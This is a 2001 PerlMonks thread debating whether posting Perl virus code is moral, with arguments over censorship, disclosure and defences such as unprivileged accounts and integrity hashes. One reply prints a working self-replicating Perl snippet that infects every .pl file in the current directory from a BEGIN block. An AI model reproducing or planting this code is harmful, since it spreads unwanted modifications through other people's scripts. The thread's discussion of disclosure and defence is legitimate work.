PerlMonks  

Morality of posting Perl "virus" code?

by tachyon (Chancellor)
on Jun 27, 2001 at 19:06 UTC (#91940=perlmeditation)

chromatic posted an obfuscation here Seekers of Perl Obfuscation that demonstrates some very interesting behaviour of SEEK when used on the <DATA> handle. While deconstructing this it struck me that this could very well be used to generate self modifying script code and what better to use as a proof of concept than a virus.

Now a perl virus is not really the same as a .exe virus in that the source is in plain view and *nix permissions prevent a lot of random file tampering by malicious code. Still I am troubled by the morality of posting such code. Is this immoral, amoral or does it have an interesting moral of some practical use?

I could imagine using this to modify the configuration variables of a script automatically for instance so that the script automatically hard codes its configuration rather than using external files.

Code has been removed by author.

cheers

tachyon

Replies are listed 'Best First'.
(tye)Re: Immoral?
by tye (Sage) on Jun 27, 2001 at 19:20 UTC

    I don't find this code particularly interesting and don't think encouraging people to look in this direction is a good idea. I'd rather you had just kept the code to yourself or found something more useful to spend your time on.

    I find that these types of things are usually built up in stages and someone getting the idea to write a Perl virus and then actually going all the way to creating a non-trivial, malicious virus is rather unlikely. But one person getting it started and then another adding to it, etc. is quite likely to end up with someone eventually producing something that I'd much rather never get produced. Part of the reason for this is that each little step along the way is a much easier moral decision based on the existence of the previous work.

    I don't know if a non-trivial virus can be written in Perl. I don't really want to find out.

    I'd appreciate having this not be approved for its section and having the code removed from it. While I don't find researching malware to be immoral, I do find releasing malware seeds to the world to be exactly that.

    (updated to add "code" to the first line. Thanks to jepri for noting that I was not being clear there.)

            - tye (but my friends call me "Tye")
      I do agree -- having a Perl virus developed may be hazardous. However, I also feel there are two sides of the story.

      Viruses have been a problem for some time, and have been developed in all sorts of languages. There are already PHP viruses. With that in mind, it would seem likely that eventually, someone would write a virus in Perl, it's just a matter of when.

      I don't feel that security by "ignoring it and hoping it goes away" would be a good long term solution. Is there anything that could ever be done to prevent a Perl virus from running? I don't really know. However, I would much rather have this opportunity to discuss the matter with the reasonable, intelligent people who frequent this site (not to be confused with "reasonably intelligent people", found at various other sites ;-), than run around trying to clean up the mess after it happens in the future, and THEN having this discussion :-)

      So opening things wide open -- is there anything that could be done with Perl to prevent a Perl virus from doing damage? It seems extremely difficult, and I don't know any other language that has figured out a way around this. But if any language could develop a system to aid in prevention, it would be Perl!

      tye, I'm not disagreeing with you per se. I suppose that I just feel that since it's going to happen anyway, that perhaps it would be easier to attempt to deal with the issue now. I'm just glad it was a monk offering code up for review, and not one of my users trying it out on my system. But perhaps this should be a non-public discussion -- I'll leave that up to you guys :-)
      -Eric

      Update: BTW, is there a system for non-public discussion on this site? Password protected forums, forums that require a particular level, etc?

      Update 2: After seeing lemming's post, I changed all references of "virii" to "viruses", which is apparently the correct usage. Thanks Lemming :-)
                Is there anything that could ever be done to prevent a Perl virus from running?

        Well, I would like to offer my suggestions.
        • Make an unprivileged user and call it "scriptGuy" or something
        • Remove all of that user's privileges everywhere, and I mean EVERYWHERE.
        • Begin restoring privileges to that user on a need-by-need basis until it becomes a semi-usable account
        • Run all scripts as that user
        • Never run code found in the wild without understanding it or, at least, trusting the source from which it came
            Now, this discussion is going to easily turn into a general discussion on computer security (i.e. shut off ftp and telnet, use ipchains, etc., etc.). But, that might not be such a bad discussion to have.

        Jeremy

        To clarify, discussing viruses and even producing a virus can be important research. Releasing the code to the world as part of the research is a big mistake in my book. It is the inclusion of the code that I object to, especially in a public place such as this.

        And I'm not claiming that hiding this one bit of code will stop the creation of viruses. I am worried that not hiding it could cause the creation of a virus. That is, speed up the creation of a virus or increase the number of such viruses.

        This is not a security measure. This is a moral decision to not contribute to the creation of a virus. Sure, think about it and talk about it, but don't hand out seeds to the world. Sure, some virus will probably come along eventually but I don't want to have had a hand in its development!

        (updated)

                - tye (but my friends call me "Tye")
      I waited a day to see if I felt the same way about what you have said - I do. On the one hand you casually dismiss the very idea with a handwave ('I don't find this particularly interesting') and yet you want it removed because you think it promotes the creation of "malware". That isn't interesting? Hmmmm, well, why teach anyone to program, then? You never know how the potential miscreants might use that skill later on!

      I have always believed that attempts to hide knowledge from others are far worse than what someone might do with that knowledge. The dirtbags of this world often depend on the ignorance and naivete of others in order to accomplish their dirty deeds.

      I see that tachyon has been pressured into removing the code. I wish he would restore it. I don't see that there is any need for censorship of anything put in this forum that was part of an honest attempt to discuss a Perl issue.

              I do find releasing malware seeds to the world to be exactly that.

          I don't know. To me, that seems akin to the old mantra "security through obscurity." That is, the "don't-talk-about-it-so-people-won't-think-about-it" kind of mentality always seems to backfire. I, for one, am intrigued by this post; but certainly not in a malicious sense. I am interested because in order to solve problems (if we would want to classify this as such), you must identify the problem and provide proof of concept, which is what tachyon did.
          To me, the real discussion should now become "how providing solutions to this problem". We should discuss making sure non-privileged users (or lowest necessary privileged users) are running Perl scripts. We should talk about verifying code found "in the wild" before running it, etc. Then, after coming up with a way to prevent this sorta thing from happening, we can return to the original problem and see if we can get around the solution we came up with.
          Do you disagree with BugTraq? They often talk about and provide proofs of concept for code and techniques that could easily be maliciously employed.
          In the end, to me, this could be turned into a very valuable discussion. Granted, the code could be modified in such a way to only provide proof of concept rather than executing that concept at all. But, I find nothing wrong with it.

      Jeremy

        When I've seen malwarish code distributed by security resources, it has always been at least one of these:

        • Already in the wild
        • Solutions to thwart it are already available
        • The code has been very carefully modified to introduce several subtle bugs
        • It is intentionally very vague, intentionally leaving out some key ideas required to make it work
        • It is a reaction to some other organization not dealing with a security issue in a manner that was considered acceptable by the distributor of the malware
        And this last item I find close to the concept that "cracking is good because it gets people to increase their security". Although I think that you can do some very careful cracking to bring home a point about a lack of security, I find it immoral to do damage while doing that. And handing out tools that can be used by others who probably don't agree with me on that is not a good idea in my book.

        I never said "don't talk about it". I don't find the working code very interesting. The concept is simple enough that I don't think the working code adds much to it. To stop such a virus you need to prevent/detect modifications to files. The details about how the modifications are done are mostly irrelevant and concentrating too much on them gets you a solution that isn't robust anyway.

        It is like untainting variables by trying to think up which characters you want to exclude. You are bound to miss some. Instead, specify which characters that you know aren't going to be a problem. For a virus, you need to figure out ways that scripts can be modified safely and how to prevent/detect all other modification, not just the modification methods highlighted by a proof of concept.

                - tye (but my friends call me "Tye")
      While I don't find researching malware to be immoral, I do find releasing malware seeds to the world to be exactly that.

      I must disagree. Morality (to me at least) depends on intent. You said above that researching malware is not immoral, well, if someone is doing that research to make a virus with mal-intent, I find that immoral. But, in tachyon's case, if he is researching in order to help, well I don't think that's immoral. Tachyon certainly did not 'release malware seeds to the world' so that the world would be worse off, he did it for quite the opposite reason. It's really a philosophy here that I'm arguing over. It comes down to this: does the end justify the means or do the means justify the end? Personally, I believe the latter to be the case.

      I don't know if a non-trivial virus can be written in Perl. I don't really want to find out.

      Again, I must humbly disagree. If we can maturely discuss these issues, then maybe we can find a way to stop a perl virus. Your argument is one for ignorance, believing that ignorance is bliss. Well, it may be, but not after someone makes a perl virus and you're faced with it anyway. I say it is much better to find out now, in a controlled environment; where we all are intelligent people with good intents.

      The 15 year old, freshman programmer,
      Stephen Rawls

        I don't claim that tachyon's intent was to encourage the production of malware. I claim that what he did is likely to do that and so is an immoral act. Whether his intent was immoral is a different question. He seemed to have moral qualms about the act. I wish he had listened more to his conscience. (:

        Again, I'm not saying we should avoid discussing it.

                - tye (but my friends call me "Tye")
(ichimunki) Re: Immoral?
by ichimunki (Priest) on Jun 27, 2001 at 20:10 UTC
    This code (at least what I saw before it was removed) was not the most complicated Perl in the world. And from what I understood of it, the virus was painfully obvious. It was certainly clearly written and documented. Imagine the same thing in obfuscated form, that didn't simply insert itself at the top of a script where you can see it.

    I don't think posting this code is immoral, and I think censoring the discussion is. Imagine if SecurityFocus incident reports were as crippled as the above discussion. The exploit description would be worthless, since only those in the "inner circle" would even know what was happening.

    That said, I find this interesting because it raises the question of how to defend against this. Given crackings at places like SourceForge, is it so hard to imagine trojaned scripts out there?

    Nothing I could come up with off the top of my head would be surefire, but is there a way to embed an MD5 hash into a script and perhaps use a module to test the script against the hash and exit on non-validation?

        #!/usr/bin/perl -wT
        use strict;
        print "Hello, world!\n";

    run hello.pl through validatination.pl to get

        #!/usr/bin/perl -wT
        use strict;
        #example of MD5 protection
        use Validate::MD5;
        print "Hello, world!\n";
        #not a real hash this is off the top of my head
        __HASH__
        1A2E8584399E234F290C

      If you're concerned about someone editing your scripts, you sure don't want to put a hash in them. You'd want it somewhere else, so if the script were compromised, the hash could detect it.
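
The approach the reply above points to (digests kept outside the scripts they protect), as an added example that is not part of any post in this thread: a manifest of SHA-256 digests (swapped in for the MD5 mentioned above) is written to a separate location and later compared against the scripts directory, so any file that is not listed with a matching digest is reported, however it was changed. The file names, the temporary directories and the manifest layout are assumptions made for the demo.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Digest::SHA;
use File::Find;
use File::Spec;
use File::Temp qw(tempdir);

# Hash every *.pl / *.pm file under $dir; keys are paths relative to $dir.
sub snapshot {
    my ($dir) = @_;
    my %digest;
    find({ no_chdir => 1, wanted => sub {
        return unless -f $_ && /\.(?:pl|pm)\z/;
        my $rel = File::Spec->abs2rel($_, $dir);
        $digest{$rel} = Digest::SHA->new(256)->addfile($_, 'b')->hexdigest;
    } }, $dir);
    return \%digest;
}

# Manifest format (an assumption): "<sha256 hex>  <relative path>" per line.
sub write_manifest {
    my ($file, $digest) = @_;
    open my $fh, '>', $file or die "cannot write $file: $!";
    print {$fh} "$digest->{$_}  $_\n" for sort keys %$digest;
    close $fh or die "cannot close $file: $!";
}

sub read_manifest {
    my ($file) = @_;
    my %digest;
    open my $fh, '<', $file or die "cannot read $file: $!";
    while (my $line = <$fh>) {
        chomp $line;
        my ($hex, $path) = $line =~ /\A([0-9a-f]{64})  (.+)\z/
            or die "malformed manifest line $.\n";
        $digest{$path} = $hex;
    }
    close $fh;
    return \%digest;
}

# Allowlist comparison: only files listed with a matching digest pass.
sub compare {
    my ($known, $current) = @_;
    my %report = (modified => [], added => [], missing => []);
    for my $path (sort keys %$current) {
        if    (!exists $known->{$path})               { push @{ $report{added} },    $path }
        elsif ($known->{$path} ne $current->{$path})  { push @{ $report{modified} }, $path }
    }
    push @{ $report{missing} }, grep { !exists $current->{$_} } sort keys %$known;
    return \%report;
}

# --- demo on constructed files in temporary directories ---
my $scripts  = tempdir(CLEANUP => 1);
my $vault    = tempdir(CLEANUP => 1);  # stands in for a place the scripts' user cannot write to
my $manifest = File::Spec->catfile($vault, 'scripts.sha256');

sub put {
    my ($name, $text) = @_;
    open my $fh, '>', File::Spec->catfile($scripts, $name) or die "cannot write $name: $!";
    print {$fh} $text;
    close $fh or die "cannot close $name: $!";
}

put('hello.pl',  "#!/usr/bin/perl -wT\nuse strict;\nprint \"Hello, world!\\n\";\n");
put('report.pl', "#!/usr/bin/perl -w\nuse strict;\nprint scalar localtime, \"\\n\";\n");
write_manifest($manifest, snapshot($scripts));

# Simulate later changes: one script gains a line, one unknown script appears.
put('hello.pl',  "#!/usr/bin/perl -wT\n# inserted line\nuse strict;\nprint \"Hello, world!\\n\";\n");
put('extra.pl',  "print 1;\n");

my $report = compare(read_manifest($manifest), snapshot($scripts));
printf "%-8s %s\n", $_, join(', ', @{ $report->{$_} }) || '-' for qw(modified added missing);

# Non-zero exit when anything differs, so a scheduled job can alert on it.
exit((grep { @{ $report->{$_} } } keys %$report) ? 1 : 0);
```

The check is only as trustworthy as the manifest: it has to live where the account running the scripts cannot write, which is the point made in the reply above.
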
Re: Immoral?
by pmas (Hermit) on Jun 27, 2001 at 20:16 UTC
    I agree with you, fellow monks.

    I ++ tachyon for creating smart code (which I cannot see, but sure it is), and ++ tye for hiding it from me - in 15 minutes after it was posted. But - it was posted for full 15 minutes!

    I am sure it will be interesting to see the code, but I agree with andreychek there should be non-public place to discuss these things.

    Most experienced monks are "saints" for a reason. They will not do harm even if they can. Less experienced malicious perl coder may be here lurking around. Do not provide him a tool to do wrong. Let him earn experience - when he will be able to build a virus, hopefully he will be saint and will not want to do it.

    Updated

    So from now on, I should be scared to install any perl module, because I always need to analyze it if it does not contain perl source-code virus? Can I hope that CPAN testers will be able to catch virus posted in CPAN site?

    Maybe smart saint monks might to get together, analyze virus, analyze virus cleaner, and put together some script parser to check for known virus concepts, and also some heuristic search for tricks possibly being used, to give me a warning which lines are suspicious?

    I was just looking for a module on ActiveState site. Now I will do it anyway, but I definitely will read the source code - and learn something...

    So I need to be concerned with tricks including SEEK and <DATA>, right?

    pmas

    To make errors is human. But to make million errors per second, you need a computer.

      So I need to be concerned with tricks including SEEK and <DATA>, right?

      Wrong. Viruses can be "implanted" in many ways, not needing <DATA> or seek. Here's some code I posted to Usenet several years ago; if you run it, it will try to infect all files ending in ".pl" in the current directory. It won't do anything but try to replicate itself. It does its business from a BEGIN block, so even running it with -c causes replication.

      #!/opt/perl/bin/perl -w use strict; # HACKED BEGIN { local *ME; if (open ME, $0) { local $/; my $me = <ME>; my ($text) = $me =~ /(# HACKED\n.*?# HACKED\n)/s; if (opendir DIR, ".") { foreach my $file (readdir DIR) { next unless $file =~ /.pl$/; local *FILE; if (open FILE, "+< ./$file") { my $program = <FILE>; unless ($program =~ /# HACKED/) { $program =~ s/\n/\n$text/; } seek FILE, 0, 0; print FILE $program; } close FILE; } } closedir DIR; } close ME; } # HACKED __END__

      -- Abigail

        Not to pick a nit (I agree with your general point) but the above code *does* use seek... around line 20 you have
        seek FILE, 0, 0; print FILE $program;

        -Blake

      pmas, I think you did a good job at summing things up.

      Let me be a devil's advocate for a moment. My question is -- where exactly does the point lie where code becomes a hazard? The code originally written on this could modify perl scripts in the current directory, and it was removed because it was deemed dangerous.

      Now, where exactly is the line drawn that separates code that is "okay" from something that should not be posted? In this case, the code was drawn up in the first place due to this post, by chromatic. In fact, chromatic's original post was rated quite high (and yes, I had to use a vote on it right now to figure that out ;-) Nobody seemed to object to that particular post.

      The code in this post was removed because it gave a working example of how to create something virus-like. But by leaving Chromatic's post, aren't we saying that it's fine to write a virus, here's how to get started, we just aren't going to show you the exact code.. meaning that the person has to be at a particular skill level to make it work. So in essence, it would seem as if we are leaving virus writing for the more skilled Perl programmers, and simply keeping the script kiddies off the street for the moment.

      Again, I'm saying all of this as devil's advocate. However, the question I am posing is this-- how do we know when to remove code? What if what was posted could be used for good as well as bad, is it worth keeping it then? What if self modifying code could be used as a fancy form of "perl -i blah"? What if "perl -i blah" could be used as a virus? Just some thoughts to ponder :-)
      -Eric
        A three-month Perl programmer could write a program that adds similar 'viral' code to all of the Perl programs or modules or CGI scripts in the current directory. The biggest thing tachyon does differently is to use *DATA to store the code and seek to rewind the pseudo file.

        Anyone who's capable of writing code that will search for files with a particular extension, open the file and insert a varying number of lines after the first line of each file is capable of writing something similar. Most people here could have done that within a few weeks of learning Perl. Several could have done that in their first week.

        That's not to say there are better examples tachyon could have chosen :), but does his code give someone a grand weapon of ferocious power? No. We already have that. It's called Perl.

Re: Morality of posting Perl "virus" code?
by lemming (Priest) on Jun 28, 2001 at 03:14 UTC

    I used to work for one of the antivirus companies. So I do know a bit about viruses, but am by no means an expert. I didn't do much deconstruction work, except on Unix.

    A lot of the viruses out in the wild now are viruses that started out as a proof of concept and then somebody else ran with it. (See Concept & Melissa for examples). Trojans are probably a bigger threat in my opinion, but the definitions have intertwined over the years.

    I'm against posting virus code even if it's harmless. It can inspire an otherwise unoriginal script kiddie to release what was before in an out-of-the-way place. It can also have legal consequences. I'd rather not open up perlmonks to that sort of exposure. We can talk about it and I'd even go for posting snippets of code that is considered dangerous, but to post a full working program is wrong. Plus I'd hate to see the next McAfee/Symantec press release.

    Some bits:

  • It's viruses, not virii language.perl.com
  • Most languages can be used to write a virus, I've seen shell scripts to man pages contain viral code.
Re: Morality of posting Perl "virus" code?
by da (Friar) on Jun 28, 2001 at 01:44 UTC
    Damian Conway wrote a self-modifying program called "SelfGOL" which also uses seek on the <DATA> handle, in a similar manner (I believe; it's pretty obfuscated code, and I haven't yet seen the talk where he explains it).

    However, the code is easy to locate on the web. If somebody wants to use seek with __DATA__ they've had quite a while to figure out how.

    Personally, I think a perl virus is much less worrying than a compiled executable virus for the obvious reasons, but the topic is intellectually fascinating.

    Here's his description of the talk:

    _______________________

    Extreme Perl -- The Horror That Is SelfGOL

    In this talk I dissect the SelfGOL program: an obfuscated, self-aware, viral quine that can:

    • self-replicate,
    • rewrite other Perl programs to allow them to self-replicate,
    • detect un-rewritable Perl programs,
    • execute itself or other Perl programs as cellular automata of arbitrary size (to play Conway's "Game of Life"),
    • animate any short text as a cycling marquee banner.

    SelfGOL accomplishes these feats in under 1000 bytes of standard Perl, without importing any modules, and without using a single if, unless, while, until, for, foreach, goto, next, last, redo, map, or grep.

    To do all that in under 1K of code, it relies on some extreme programming techniques, and on many of the obscure backwaters of the Perl syntax. This talk explores both.

    _______________________

    He's coming to boston.pm in less than two weeks; if we're lucky he may do this talk.

    ___
    -DA

code restored (Re: Immoral?)
by tye (Sage) on Jun 27, 2001 at 20:52 UTC

    After more time for people to weigh in on the subject, the tally is roughly evenly divided on whether the code should stay hidden.

    As one of the editors, a 50/50 split is certainly not enough of a mandate to get me to "edit" a node, so I have undone my temporary changes to the node.

    I've submitted this to Nodes to consider so that high-level monks can vote on whether they think the code should remain. This vote is really for informational purposes only as the reputation on the node is fairly positive and so it is very unlikely to be deleted (and will be restored even if that happens) and I seriously doubt there will be enough of a mandate to warrant changes by one of the editors. But I'm curious what the numbers from this informal poll will be. Think of it as a way to take a side without having to write a whole node. I apologize that lower-level monks will not be able to participate -- that is what happens when I abuse features of the site for things that they weren't intended. (:

            - tye (but my friends call me "Tye")

      Soon after this my view of the (informal, unscientific) tally (involving node reputations, Nodes to consider votes, and public and private comments to me) started to shift and I now place it somewhere between 3-to-1 and 7-to-1 in favor of not removing the code.

      Even if the tally had ended up being close to 50/50, I would not repeat the temporary removal of viral code. Not that I regret what I did. This was "a first" in some ways and I asked before acting but acted quickly to make temporary changes that I thought were important. I think part of my motivation was tachyon's own words: "Still I am troubled by the morality of posting such code."

      I also have not changed my mind about seemingly innocent but working code with viral features making it easier for malware to be produced, at least as much for allowing the steps toward malware to be small enough that they are easy to justify as not immoral as for just getting the ball rolling in terms of curiosity, motivation, and a code base.

      Anyway, I wanted it to be clear that I won't be doing that for "dangerous" code again. I may well /msg the author encouraging them to change their mind, though. (:

              - tye (but my friends call me "Tye")
Re: Immoral? (boo)
by boo_radley (Parson) on Jun 27, 2001 at 20:35 UTC
    I normally don't follow votes up with posts, but this strikes me as an incredibly bad idea, and I've --ed it accordingly.
    I acknowledge that almost any modern programming language is capable of being viral, I'd really hate to see anything like this spread. I also have to acknowledge that just by seeing this in a public environment means that it's already spread.
    Even if you meant it in fun, this was a bad idea.
Re: Morality of posting Perl "virus" code?
by shotgunefx (Parson) on Jun 28, 2001 at 02:00 UTC
    While this is a really fascinating subject with some actual potential "good" uses, I have to agree with tye in the face that most hackers are just "script kiddies" who change a line or two and then we have something to worry about.

    I'm not suggesting that these subjects are not discussed, but perhaps it would be best not to be posting working examples. Even if the principles were demonstrated through unrelated code fragments, this would deter, I think, a lot of the "coding challenged" little turds who have nothing better to do than try and break stuff.

    Personally, I think a much larger threat is the downloading of modules from CPAN. I have a feeling that a lot of admins and programmers don't have the time or inclination to do a code review of every module they use.

    -Lee

    "To be civilized is to deny one's nature."
Re: Immoral? Warning: Virus code still visible!
by pmas (Hermit) on Jun 27, 2001 at 20:33 UTC
    Please remove virus code! It is posted also in answer to original obfuscation (I do not want to link it from here).

    pmas

    To make errors is human. But to make million errors per second, you need a computer.

      I checked it again. Virus code was removed from original posting, but I believe valid viral code is still openly posted in an answer to obfuscation. I posted a warning that virus is still available to download for anybody, and I get downvoted for this post.

      I assume it is from virus hackers - for dis-service for malicious hackers community?.. :o)

      It will be interesting to find out who downvoted me, and for what reason.

      pmas

      To make errors is human. But to make million errors per second, you need a computer.
